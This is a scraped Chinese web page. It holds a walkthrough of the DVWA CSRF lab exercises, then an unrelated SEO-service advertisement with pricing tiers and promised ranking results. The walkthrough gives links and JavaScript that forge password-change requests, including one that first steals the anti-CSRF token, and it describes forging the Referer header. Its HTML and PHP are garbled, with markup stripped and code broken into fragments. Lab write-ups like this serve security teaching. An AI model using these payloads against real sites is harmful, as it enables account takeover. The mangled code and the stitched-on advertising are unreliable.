96SEO 2026-02-19 23:39 26
写一个简单的html文件#xff0c;里面伪装修改密码的文字#xff0c;代码如下#xff1a;

hrefhttp://dvwa:7001/vulnerabilities/csr…DVWA-csrf实例
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-low/a/body
/html点击dvwa-csrf-low文字后跳转到dvwa的修改密码界面提示Password
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-low/a/bra
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-middle/a/body
/html点击dvwa-csrf-middle文字后跳转到dvwa的修改密码界面提示***
查看源码发现会校验http_referer和server_name两个参数不为空。
对比成功的请求与失败的请求发现失败的请求缺失了refererreferer用来表示从哪个页面链接到当前的网页。
用于浏览器的同源策略。
网上另外解法修改host和referer为localhost或127.0.0.1其实也是遵循同源策略。
修改密码修改的密码通过get请求暴露在url上并且带上user_token。
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-low/a/bra
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-middle/a/bra
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new2password_conf2ChangeChangeuser_token96f6243c53766d30d5e51cf92c15f9a3#dvwa-csrf-high/a/body
/html点击dvwa-csrf-high文字后跳转到dvwa的修改密码界面提示csrf
对比成功的请求与失败的请求发现失败的请求缺失了refererreferer用来表示从哪个页面链接到当前的网页。
用于浏览器的同源策略。
利用bp工具补上referer的参数。
结果还是失败。
因此查看源码#1这行有进行token的校验。
#2这行进行token生成大致可以分析出token生成后一次性校验跟验证码同理。
((isset($GLOBALS[___mysqli_ston])
is_object($GLOBALS[___mysqli_ston]))
mysqli_real_escape_string($GLOBALS[___mysqli_ston],
((trigger_error([MySQLConverterToo]
mysqli_query($GLOBALS[___mysqli_ston],
((is_object($GLOBALS[___mysqli_ston]))
mysqli_error($GLOBALS[___mysqli_ston])
match./pre;}((is_null($___mysqli_res
mysqli_close($GLOBALS[___mysqli_ston])))
generateSessionToken();?基于分析出的结论要构建一个新请求先调用#2再调用修改密码的请求此时为了避免跨域问题。
将写好的html直接放到dvwa下。
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-low/a/bra
hrefhttp://dvwa:7001/vulnerabilities/csrf/?password_new1234password_conf1234ChangeChange#dvwa-csrf-middle/a/bra
onclickinitJS()dvwa-csrf-high/a/bodyscript
http://dvwa:7001/vulnerabilities/csrf/;
ActiveXObject(Microsoft.XMLHTTP);
xmlhttp.onreadystatechangefunction(){if(xmlhttp.readyState
http://dvwa:7001/vulnerabilities/csrf/?user_tokentokenpassword_new1password_conf1ChangeChange;if(count0){count;//此代码用于只执行一次修改密码xmlhttp.open(GET,new_url,false);xmlhttp.send();}}
xmlhttp.open(GET,***Url,false);
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback